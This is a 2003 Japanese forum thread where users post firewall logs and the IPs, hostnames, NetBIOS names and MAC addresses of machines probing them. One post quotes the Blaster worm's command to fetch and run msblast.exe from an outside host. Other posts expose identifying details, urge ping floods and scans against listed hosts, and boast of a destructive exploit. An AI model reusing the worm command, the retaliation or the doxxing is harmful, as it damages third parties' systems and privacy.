名無しさん@お腹いっぱい。 :03/08/14 10:29
そうそういないけど、個人のサーバーがspamの踏み台に使われてるのはかなり迷惑
696 :
名無しさん@お腹いっぱい。 :03/08/14 11:33
192.168.1.11 whoisでも逆引き出来ないのだけど、かなり凶悪なクラッカーかな?
>>696 whoisすると
Samba_Mitiko.home.linuxでした
699 :
名無しさん@お腹いっぱい。 :03/08/14 17:44
61.121.100.27 61.121.100.20
61.197.60.71[pl327.nas921.akita.nttpc.ne.jp] いいかげんうざいです。早く死んでください。
702 :
名無しさん@お腹いっぱい。 :03/08/15 17:12
202.229.198.199:80
未使用ポート遮断機能が通信を遮断しました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 211.108.51.147,epmap(135) 最近こういうの多すぎ。135ポートばっかり狙ってる。
IPアドレス 24.79.161.91 ホスト名 h24-79-161-91.wp.shawcable.net
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
706 :
名無しさん@お腹いっぱい。 :03/08/16 02:14
IP: 61.205.186.155 DNS: zaq3dcdba9b.zaq.ne.jp Node: VAIO上村 Group: WORKGROUP NetBIOS: ADMINISTRATOR MAC: 00104BA1AC0F
707 :
名無しさん@お腹いっぱい。 :03/08/16 02:15
IP: 61.205.168.248 Node: KAPPA3 Group: (有)なつき NetBIOS: __MSBROWSE__ MAC: 000A7905EB26 DNS: zaq3dcda8f8.zaq.ne.jp
708 :
名無しさん@お腹いっぱい。 :03/08/16 02:18
IP: 219.162.27.248 Node: スーパーけんた NetBIOS: OWNER Group: DATA MAC: 005345000000 DNS: p6248-ip02niigatani.niigata.ocn.ne.jp
709 :
名無しさん@お腹いっぱい。 :03/08/16 04:29
24.34.138.183[h00010323315e.ne.client2.attbi.com] 今日は2回もトロイの攻撃があったよ。 しかもね、一回目は米国で二回目は英語わからないから 国名読めなかったけどヨーロッパだったよ。 毎日最低1回はトロイの警告が出るのはなんでだろう? しかも全部国内じゃなくて外国だよ。 毎日攻撃されてちゃ身が持たないよ。(´Д⊂グスン
710 :
名無しさん@お腹いっぱい。 :03/08/16 12:44
TCP SYN FLOOD 64.246.54.70 2003/08/15 16:50:46 - 2003/08/15 17:01:39 11hit ポートスキャン 64.246.54.70 2003/08/15 16:54:37 - 2003/08/15 16:57:46 8hit
711 :
名無しさん@お腹いっぱい。 :03/08/16 15:44
219.53.92.20 ウザすぎ!!
219.162.120.149 こいつうぜえ
714 :
port 4444 :03/08/17 22:48
こんなん来ました。ブラスター系 ## client addr=61.13.57.225, port=55570 ## hostname : c225.h061013057.is.net.tw Location: +0 +4 +8 +C /0123456789ABCDEF 00000000: 74667470 202d6920 36312e31 332e3537 /tftp -i 61.13.57 00000010: 2e323235 20474554 206d7362 6c617374 /.225 GET msblast 00000020: 2e657865 0a /.exe. Location: +0 +4 +8 +C /0123456789ABCDEF 00000000: 73746172 74206d73 626c6173 742e6578 /start msblast.ex 00000010: 650a /e. Location: +0 +4 +8 +C /0123456789ABCDEF 00000000: 6d73626c 6173742e 6578650a /msblast.exe.
あらら、崩れまくり。。。
みんなどの解析結果サラ支店の? ルーター?FW? うちっとこのFWコピペできなくて不便
FWにport 135,4444を待ち受ける偽サーバを置いておくと コネクトしてくるので面白い。
アタッカーのIPを晒すとかってスレを立てておくと 馬鹿が書き込んでくるので面白い。
私はここに書き込んでいる方々のようにアタッカーのIPを調べる方法を知りません。 FWのログに残っているのは踏み台やウイルスに感染したコンピュータのIPばかりです。 アタッカーのIPを調べたいので私にも調べ方を教えてください。
>>720 > 私はここに書き込んでいる方々のようにアタッカーのIPを調べる方法を知りません。
アタッカーじゃなくて、ほとんどはゴミバケツなんだけどね
722 :
名無しさん@お腹いっぱい。 :03/08/19 01:00
p6177-ipad02osakakita.osaka.ocn.ne.jp こいつうざいからピング10時間ぐらいしてます
( ´_ゝ`)フーン
N.Koreaからトロイの攻撃来襲記念ぱぴぽ IP: 211.229.14.227 Network:POHANG NODE Location:Pohang Korea netname:KORNET-XDSL-POHANG.KR descr:POHANG NODE descr:135-19 DAEDODONG NAMKU POHANGSI descr:KYONGBUG descr:790-140 country:KR admin-c:GP1604-KR
ノートンのvisual trackingではN.KOREAだったけど 地図見たら韓国だった。失礼ヲバ。
726 :
名無しさん@お腹いっぱい。 :03/08/19 08:29
昨夜あたりから、やたらこんなのが来てるんですが 亜種関係ですか? それか串サイトでもアドレス晒されたのかと思うのですが。 68.161.126.225 - - [19/Aug/2003:07:49:01 +0000] "GET / HTTP/1.1" 200 921 "-" "Mo zilla/4.0 (compatible; MSIE 5.5; Windows 98)" 61.144.248.165 - - [19/Aug/2003:07:58:51 +0000] "GET / HTTP/1.1" 200 921 "-" "Mo zilla/4.0 (compatible; MSIE 5.5; Windows 98)" 61.240.246.65 - - [19/Aug/2003:08:08:11 +0000] "GET / HTTP/1.1" 200 921 "-" "Moz illa/4.0 (compatible; MSIE 5.5; Windows 98)" 211.186.104.192 - - [19/Aug/2003:08:14:48 +0000] "GET / HTTP/1.1" 200 921 "-" "M ozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 207.172.46.73 - - [19/Aug/2003:08:16:57 +0000] "GET / HTTP/1.1" 200 921 "-" "Moz illa/4.0 (compatible; MSIE 5.5; Windows 98)" 昨夜よりも前には、ほとんどこんなログは無かったのですがどうですか? 教えてください
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.148.128.0-210.148.135.0
b. [ネットワーク名] PPP-EXCITE
f. [組織名] エキサイト株式会社
g. [Organization] Excite Japan Co., Ltd.
m. [運用責任者] EK861JP
n. [技術連絡担当者] JF254JP
p. [ネームサーバ] ns00.cdn-japan.com
p. [ネームサーバ] ns01.cdn-japan.com
y. [通知アドレス]
[email protected] [割当年月日] 2002/07/19
[返却年月日]
[最終更新] 2003/07/24 15:26:06 (JST)
[email protected]
728 :
名無しさん@お腹いっぱい。 :03/08/19 22:20
IP: 219.164.19.225 Node: 島徹彰 Group: WORKGROUP NetBIOS: 島徹彰1 MAC: 444553547777 DNS: m019225.ap.plala.or.jp
729 :
名無しさん@お腹いっぱい。 :03/08/19 22:20
IP: 220.97.224.208 Node: 大東園 Group: WORKGROUP NetBIOS: WORKGROUP MAC: 444553547777 DNS: p2208-ipbf08fukuokachu.fukuoka.ocn.ne.jp
730 :
名無しさん@お腹いっぱい。 :03/08/19 22:21
IP: 220.97.36.78 Node: 水野 Group: FORTUNE NetBIOS: 水野1 MAC: 005345000000 DNS: p3078-ipad71marunouchi.tokyo.ocn.ne.jp
731 :
名無しさん@お腹いっぱい。 :03/08/19 22:21
IP: 219.162.170.198 Node: 三高商運 Group: WORKGROUP NetBIOS: ADMINISTRATOR MAC: 444553547777 DNS: p5198-ipad25osakakita.osaka.ocn.ne.jp
732 :
名無しさん@お腹いっぱい。 :03/08/19 22:22
IP: 218.43.212.191 Node: 岐阜営業所 Group: WORKGROUP NetBIOS: WORKGROUP MAC: 444553547777 DNS: p1191-ipad02gifu.gifu.ocn.ne.jp
733 :
名無しさん@お腹いっぱい。 :03/08/20 03:08
IPを晒すのって法的に問題ないの? 逮捕された人が、晒してある踏み台を使った場合とか。 誰か詳しい人教えてください。
734 :
名無しさん@お腹いっぱい。 :03/08/20 03:13
踏み台にされる側にも問題があるわけだが、 晒すことには問題ありそうだな。
それに晒されてるIPはほとんど ウイルス感染してるマシンであり ウイルスが勝手にアタックしているものが 大半を占めていると思うに一票
>>734 初耳です、jpnicは違法ですか?
さらされて困るIPなら そもそも不用意に無許可でアクセスするほうが悪くないか?
勝手にアクセスしてきたIPに気遣か?
>>733 問題ないです。
今日自分の家に、だれだれと名乗る、どこどこの方から来ましたと名乗る
訪問者がいて、そのことを公表するなというほうがおかしい。
別にこちからか募集して訪問したことの秘密を守るとか公言しているわけではないだろ。
738 :
名無しさん@お腹いっぱい。 :03/08/21 22:06
03.8.21 22:03:01拒否不明135TCP220.145.235.224ntfksm032224.fksm.nt.adsl.ppp.infoweb.ne.jp 03.8.21 22:03:00拒否不明135TCP220.145.235.224ntfksm032224.fksm.nt.adsl.ppp.infoweb.ne.jp 03.8.21 22:02:34拒否不明135TCP220.144.176.143fla1aao143.myg.mesh.ad.jp 03.8.21 22:02:33拒否不明135TCP220.144.176.143fla1aao143.myg.mesh.ad.jp 03.8.21 22:00:36拒否不明135TCP220.145.240.53nttcgi031053.tcgi.nt.adsl.ppp.infoweb.ne.jp 03.8.21 22:00:29拒否不明135TCP220.145.240.53nttcgi031053.tcgi.nt.adsl.ppp.infoweb.ne.jp 03.8.21 21:59:54拒否不明135TCP220.145.162.51kihn008051.catv.ppp.infoweb.ne.jp 03.8.21 21:59:11拒否不明135TCP220.145.107.192nttcgi034192.tcgi.nt.adsl.ppp.infoweb.ne.jp 03.8.21 21:59:04拒否不明135TCP220.145.107.192nttcgi034192.tcgi.nt.adsl.ppp.infoweb.ne.jp 03.8.21 21:58:45拒否不明135TCP220.145.44.54ntnigt037054.nigt.nt.adsl.ppp.infoweb.ne.jp 03.8.21 21:58:44拒否不明135TCP220.145.44.54ntnigt037054.nigt.nt.adsl.ppp.infoweb.ne.jp 03.8.21 21:54:34拒否不明135TCP220.145.94.221
ここでIPアドレス晒しても意味無いのは確かだが。 自分でISPに言えよ。
>739 イヤ、漏レが改良したEXPLOITで、次回起動時フォーマットするヂョ!.bat流し込んでレジストリ 改変しとくから大丈夫。 それより、誰か上のリストのリモホ宛てport135でスキャヌしてopenしてるヤシだけログ貼り出してクレ。頼んだゾ!
742 :
名無しさん@お腹いっぱい。 :03/08/22 00:12
2003/08/22 0:06:16通信の要求211.10.246.146TCP(1038) 2003/08/22 0:04:16通信の要求211.10.246.146TCP(1038) 2003/08/22 0:02:56通信の要求206.112.112.5TCP(1089) 2003/08/22 0:02:16通信の要求211.10.246.146TCP(1038) 2003/08/22 0:01:39通信の要求211.10.246.154TCP(1039) 2003/08/22 0:00:57通信の要求206.112.112.5TCP(1089) 2003/08/22 0:00:16通信の要求211.10.246.146TCP(1038) 2003/08/21 23:59:39通信の要求211.10.246.154TCP(1039) 2003/08/21 23:58:57通信の要求206.112.112.5TCP(1089) 2003/08/21 23:58:16通信の要求211.10.246.146TCP(1038) 2003/08/21 23:57:39通信の要求211.10.246.154TCP(1039)
ここ数日、icmp echoリクエストがいろんな所から大量に届いている(一分間に10〜100前後)のですが、 これは一体なんでしょうか? ↓ちなみについさっきのログ 00:18:49.521813 xxx-51-52-181.nrp1feld.roc.ny.frontiernet.net > xxx.xxx.xxx.xxx: icmp: echo request 00:19:01.018292 xxx.128.153.146 > xxx.xxx.xxx.xxx: icmp: echo request 00:19:01.467896 xxx.25.145.45 > xxx.xxx.xxx.xxx: icmp: echo request 00:19:11.606740 xxxl-151-205-121-174.ny325.east.verizon.net > xxx.xxx.xxx.xxx: icmp: echo request 00:19:19.372920 xxxitm065021.sitm.nt.adsl.ppp.infoweb.ne.jp > xxx.xxx.xxx.xxx: icmp: echo request 00:20:25.440436 xxx.191.13.174 > xxx.xxx.xxx.xxx: icmp: echo request 00:21:55.131985 xxxich014077.aich.nt.isdn.ppp.infoweb.ne.jp > xxx.xxx.xxx.xxx: icmp: echo request
>>744 聞くところに因るとblaster.Dのせいらしいです。
でも実は、本日密かに開催されてる全国スキャン祭りの一環だと私は睨んでますが。
>>745 「全国」って日本全国ですか?エクアドルとかザンビアとかからもきてるんで、そっちじゃないとは
おもいますが…
無羅星Dってたんに135をつつくだけかと思ったらICMPもつつくんですね。勉強になりました。
ありがとうございました。
ちなみにicmp echo reqは特別な場合以外は全てルーターではじいているのでうちは無問題です。
ちなみに、一応リクエストしたノードに対してはhostアンリーチブルを返すようにしてますが、
これは無駄でしょうか?
あーでもこういう逆引き不可な似たようなアドレスのが殆ど同時に連続してくるってのも怪しい気がするな… 00:41:23.859785 61.128.175.207 > xxx.xxx.xxx.xxx: icmp: echo request 00:41:43.520952 61.144.83.115 > xxx.xxx.xxx.xxx: icmp: echo request 00:42:31.201191 61.128.210.219 > xxx.xxx.xxx.xxx: icmp: echo request 00:42:31.962711 61.241.149.131 > xxx.xxx.xxx.xxx: icmp: echo request 00:42:37.387965 61.174.160.13 > xxx.xxx.xxx.xxx: icmp: echo request 00:43:03.775087 61.128.193.203 > xxx.xxx.xxx.xxx: icmp: echo request
>>746 イヤ、今回は海外の招待選手も居るらしいです。
どうなんでしょう。。>hostアンリーチブル
まぁ、blast.Dさんがアンリーチブルをちゃんと認識して「ヤーメタ、次逝コ!」くれるように書かれて居れば
別ですが。
749 :
名無しさん@お腹いっぱい。 :03/08/22 00:53
>>748 なるほでぉ。
いつも寝る前はルーターをシャットダウンしているんですが、今夜はつけっぱなしにして
フィルターにムフフな設定をして、cronとかにもムフフなことを書き込んでやりますた。
明日の朝ログを見るのが楽しみ。便乗さん、いらっしゃい〜
751 :
名無しさん@お腹いっぱい。 :03/08/22 02:13
FLA1Aae054.smn.mesh.ad.jp NCCa1Aac194.myg.mesh.ad.jp
753 :
名無しさん@お腹いっぱい。 :03/08/23 06:54
ここでIPを干している香具師は、勘違いしてないか?
日付: 2003/08/23 時刻: 6:58:27 アドレス 213.6.52.26 からの不正侵入の試みを規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 によって検出しました。 以降のアクセスを 30 分間遮断しました。
755 :
殺していいよ :03/08/23 14:43
2003/08/23 14:35:17通信の要求211.10.246.144TCP(1302) 2003/08/23 14:33:17通信の要求211.10.246.144TCP(1302) 2003/08/23 14:33:01通信の要求211.10.246.160TCP(1293) 2003/08/23 14:31:17通信の要求211.10.246.144TCP(1302) 2003/08/23 14:31:01通信の要求211.10.246.160TCP(1293) 2003/08/23 14:29:17通信の要求211.10.246.144TCP(1302) 2003/08/23 14:29:01通信の要求211.10.246.160TCP(1293) 2003/08/23 14:27:17通信の要求211.10.246.144TCP(1302) 2003/08/23 14:27:01通信の要求211.10.246.160TCP(1293) 2003/08/23 14:25:17通信の要求211.10.246.144TCP(1302) 2003/08/23 14:25:01通信の要求211.10.246.160TCP(1293) 2003/08/23 14:24:01通信の要求211.10.246.146TCP(1234) 2003/08/23 14:23:17通信の要求211.10.246.144TCP(1302) 2003/08/23 14:23:01通信の要求211.10.246.160TCP(1293) 2003/08/23 14:22:01通信の要求211.10.246.146TCP(1234) 2003/08/23 14:20:01通信の要求211.10.246.146TCP(1234) 2003/08/23 14:18:01通信の要求211.10.246.146TCP(1234) 2003/08/23 14:16:01通信の要求211.10.246.146TCP(1234) 2003/08/23 14:14:01通信の要求211.10.246.146TCP(1234) 2003/08/23 14:12:02通信の要求211.10.246.146TCP(1234)
>>755 そこから本気でアタックされたら君はひとたまりもないよ
俺ならISPとNIC変える
漏れだったらLANケーブル抜いて寝る(w
さきほどマイクロソフトからでした(トロイ) 65.54.240.61 OrgName: Microsoft Corp OrgID: MSFT Address: One Microsoft Way City: Redmond StateProv: WA PostalCode: 98052 Country: US NetRange: 65.52.0.0 - 65.55.255.255 CIDR: 65.52.0.0/14 NetName: MICROSOFT-1BLK NetHandle: NET-65-52-0-0-1 Parent: NET-65-0-0-0-0 NetType: Direct Assignment NameServer: DNS1.CP.MSFT.NET NameServer: DNS2.CP.MSFT.NET NameServer: DNS1.TK.MSFT.NET NameServer: DNS1.DC.MSFT.NET NameServer: DNS1.SJ.MSFT.NET Comment: RegDate: 2001-02-14 Updated: 2002-12-05
80.139.160.66 漏れを攻撃するやつはドイツのどいつじゃ?
760 :
名無しさん@お腹いっぱい。 :03/08/25 23:27
218.221.219.234 木馬野郎
やだなー。カナダのオタたちがバックドアなげてくるよー 家のノートン先生も怒りっぱなし・・・・・ しかもたまにIP偽造してる人達まで・・・(藁
被害妄想はやめれ。
たいていバカプログラムに感染するようなアフォPCから
無差別に送られてくるだけだ。
あんたらも(あんたらの言う)攻撃仕掛けてるかもしれんのに。
つーか1がろくに調べんと書いてたのには…
そりゃ一応ウィルスからアタックされてるが。
>>753 禿同。
よくわかっていないのでKerioでaskにしてるんだけど、
さっき、(なんとか).army.milからポート99になんか来たので慌ててDenyした
こういうのって詐称?
ちなみに
ttp://www.army.mil/ 落ちてます?pingも帰ってこない
訂正:99から来たんだったかも・・ TCP/IP Kernel Driver向けだったはず・・ ログが残ってなくてヘタレですみません。
765 :
名無しさん@お腹いっぱい。 :03/08/26 04:01
郵便局の口座番号から住所や名前ってわかりますかねー? そいつにある事情(だいたい予想はつくと思いますが)により 五万円騙しとられたみたいな感じなんです。
YBBは全部拒否に登録してみた。
OrgName: Comcast Cable Communications Holdings, Inc
OrgID: CCCH-3
Address: 3 Executive Campus
Address: 5th Campus
City: Cherry Hill
StateProv: NJ
PostalCode: 08002
Country: US
NetRange: 24.125.0.0 - 24.125.127.255
CIDR: 24.125.0.0/17
NetName: CCCH3-20
NetHandle: NET-24-125-0-0-1
Parent: NET-24-0-0-0-0
NetType: Direct Allocation
NameServer: NS4.ATTBB.NET
NameServer: NS5.ATTBB.NET
NameServer: NS6.ATTBB.NET
Comment:
RegDate:
Updated: 2003-08-19
OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail:
[email protected] OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications, Inc.
OrgTechPhone: +1-856-317-7300
OrgTechEmail:
[email protected]
770 :
名無しさん@お腹いっぱい。 :03/08/28 17:41
219.182.184.1 yahooBB219182184001.bbtec.net ハッカーの方居ましたら宜しく。 HD MB乗せ変えなんであぼ〜んOKです。 ドコまで出来るの?
ここは私怨厨房の肥溜めです。
61.203.207.171
773 :
殺していいよ :03/08/29 05:57
2003/08/29 5:53:39通信の要求211.10.246.154TCP(1050) 2003/08/29 5:51:39通信の要求211.10.246.154TCP(1050) 2003/08/29 5:49:39通信の要求211.10.246.154TCP(1050) 2003/08/29 5:47:39通信の要求211.10.246.154TCP(1050) 本当にしつこい
206.112.112.70 リアルタイムでやられてる者です。どうにかなんない?基地外
216.17.74.50:18800
>>775 なんで?これって実は何も危険のないアクセスなの?だとしたらたしかに
俺はバカだ。(笑
206.112.112.70 死ねや、カスが。
210.190.142.73 本当にしつこい。どっかいけ。
あぼーん
781 :
名無しさん@お腹いっぱい。 :03/09/03 05:25
わずか20分の間に1000回を越えるアタック。 許せない。 65-70-160-129.tklaw.com
ついに2000回を越えたわけだが・・・ コイツ一つだけでログが膨大に・・・
同時進行で HSE-QuebecCity-ppp84103.qc.sympatico.caも1400を超えるアタック。 もう寝よ・・・。
セキュ板の華やねここは
785 :
名無しさん@お腹いっぱい。 :03/09/03 13:45
時間, イベント, 侵入者, 侵入者の IP, 発信元ポート, 宛先ポート, カウント 2003/09/03 13:20:39, DNS_NonInternet, 61.25.250.14, 61.25.250.14, 53, 4429, 2337 2003/09/03 13:20:42, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 271 2003/09/03 13:20:44, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 261 2003/09/03 13:20:47, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 847 2003/09/03 13:20:47, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 367 2003/09/03 13:20:47, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 26162 2003/09/03 13:20:54, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 8429 2003/09/03 13:20:57, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 298 2003/09/03 13:20:58, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 419 2003/09/03 13:21:01, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 792 2003/09/03 13:21:01, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 380 2003/09/03 13:21:01, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 25228 2003/09/03 13:26:29, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4495, 892 通報しますた
786 :
名無しさん@お腹いっぱい。 :03/09/03 23:27
169.254.0.8 からNBT 又は Microsoft-DS パケットのルーティング UDPポート:138 で、1分間に100を越えるログが… それが納まったら135に猛然とアタック〜。 ログが溜まりまくり〜ホホホホヽ( ´▽` )ノオネーサンオドッチャウワ♪
787 :
名無しさん@お腹いっぱい。 :03/09/04 19:14
gateway.zd-mb.si しつこい。 たった15分間で950を超えるアタック。 あーもう。
788 :
名無しさん@お腹いっぱい。 :03/09/04 23:27
踏み台やら串使って、アタックしてきたIPから、 どうやって生IPが特定できるのでしょうか? IPから追跡しても相当な数の踏み台を介してアタックされるので…。 よければ方法を教えてください。 そもそもこれらどこのデータ張ってるんですか?
z30.219-103-217.ppp.wakwak.ne.jp p3119-ipbf05marunouchi.tokyo.ocn.ne.jp p2133-ipadfx01maru.tokyo.ocn.ne.jp SMNfi-01p1-41.ppp11.odn.ad.jp host-B098.kakita.ne.jp もーうざい
790 :
名無しさん@お腹いっぱい。 :03/09/04 23:30
791 :
名無しさん@お腹いっぱい。 :03/09/04 23:33
あぼーん
793 :
名無しさん@お腹いっぱい。 :03/09/05 10:24
時間, イベント, 侵入者, 侵入者の IP, 発信元ポート, 宛先ポート, カウント 2003/09/05 10:14:50, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 24 2003/09/05 10:14:51, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 25 2003/09/05 10:14:51, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 12 2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 10 2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 13 2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 48 2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 59 2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 5 2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 5 2003/09/05 10:15:02, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1 2003/09/05 10:15:04, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1 2003/09/05 10:15:07, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1921 またきた 氏ね
794 :
名無しさん@お腹いっぱい。 :03/09/05 14:48
カウント, 時間, イベント, 侵入者, 侵入者の IP, 宛先ポート, 発信元ポート 5, 2003/09/05 14:01:44, ICMP_Subnet_Mask_Request, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 0, 17 2, 2003/09/05 14:01:34, UDP_Probe_Other, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 51294, 69 ●1159, 2003/09/05 13:00:37, TCP_Port_Scan, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 539, 4534 誰かこのDQNを止めてくれ
アタッカーって何のためにそんな(1分間に100ですか?)ことやるんですかね 余程の暇人かと。
796 :
名無しさん@お腹いっぱい。 :03/09/06 11:19
アタッカーがされたかどうかのログはどこで見れるのですか?
1 192.168.1.1 0 ms 3 10.26.1.67 16 ms 4 10.26.253.20 15 ms 5 10.26.1.121 16 ms 6 10.0.26.129 15 ms 7 10.9.17.145 203 ms 8 202.213.198.169 16 ms 9 202.213.193.82 31 ms 10 202.213.193.188 31 ms 11 61.211.63.132 16 ms 12 61.211.63.70 32 ms 13 219.98.13.95 46 ms ルート見ててる(´_ゝ`)
798 :
名無しさん@お腹いっぱい。 :03/09/06 20:53
>>758 Microsoftにアタックされるなんて、あなた何したんですか?
799 :
名無しさん@お腹いっぱい。 :03/09/06 21:11
219.106.178.149 135 共有ポートにしつこく毎日やってくる 殺してください
800 :
名無しさん@お腹いっぱい。 :03/09/06 21:50
800
2003/09/07 00:37:06 66.220.17.151:80 (151.17.220.66.in-addr.arpa) xxx.xxx.xxx.xxx:1306 ポート 1306 (TCP) 毎日〜IP変えてがんばるなぁ、こいつ。
Sep 6 23:59:58 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:00:01 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:00:08 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:00:26 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:00:29 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:00:36 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:00:54 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:00:58 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:01:04 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:53:15 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:53:18 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:53:24 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:53:47 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:53:50 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:53:56 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:54:14 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:54:17 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 Sep 7 00:54:24 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0 こういうのって、普通の出来事なんでしょうか?
219.164.197.169
10.6.47.243
OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
NetRange: 10.0.0.0 - 10.255.255.255
CIDR: 10.0.0.0/8
NetName: RESERVED-10
NetHandle: NET-10-0-0-0-1
Parent:
NetType: IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: This block is reserved for special purposes.
Comment: Please see RFC 1918 for additional information.
Comment:
RegDate:
Updated: 2002-09-12
OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail:
[email protected] OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail:
[email protected]
805 :
名無しさん@お腹いっぱい。 :03/09/08 10:56
03/09/08 午前 9:20:12通信の要求211.196.154.209TCP(1509)
806 :
名無しさん@お腹いっぱい。 :03/09/08 21:43
>>756 a1021.lm.a.yimg.com
a211-10-246-138.deploy.akamaitechnologies.com
こいつらって何なの?知ってるの?
>>806 akamaitechnologies.comはyahooにアクセスするとき通信してるみたいだったけど。
808 :
名無しさん@お腹いっぱい。 :03/09/08 22:45
a211-10-246-138.deploy.akamaitechnologies.com こいつのポートスキャン激しくウザイんだよ、しかも ログを見ると”a1021.lm.a.yimg.com” こいつと、つるんでるみたいだから もうIPレンジでフィルタかけたんだけど。
220.211.223.77:7743 (pd3df4d.ykhmac00.ap.so-net.ne.jp) 218.43.134.43:1268 (p4043-ipad12sasajima.aichi.ocn.ne.jp) 218.220.192.72:26497 (zaqdadcc048.zaq.ne.jp) 61.192.98.175:17265 (zaq3dc062af.zaq.ne.jp)
>>806 akamaitechnologies.com
ごくフツーの人にはあまり知られていないが、ちょー凄い集団だ。
かなりの数のマシンを持っており、保持するIPも広範囲。
もし本当に攻撃されれば、もうだめぽ。
なぜかスキャンされてるといった程度なら、放置汁。
内部からのアクセスによる情報漏れが禿しく気になるのであれば
IPを遮断するしかない。
ほんと複数のIPでそれぞれ同じことを同時にしてくるから うざくて。
akamaitechnologies.comってサンスポやZAKZAKの入ってる鯖やじゃないの?
>>813 よ、俺のところにアタックしに来ていたのは、ここを踏み台にしていた「夏厨」じゃなくて、
「eビジネスで飯を食ってるやつらが串も刺さずにやってきた!」と言うことか?
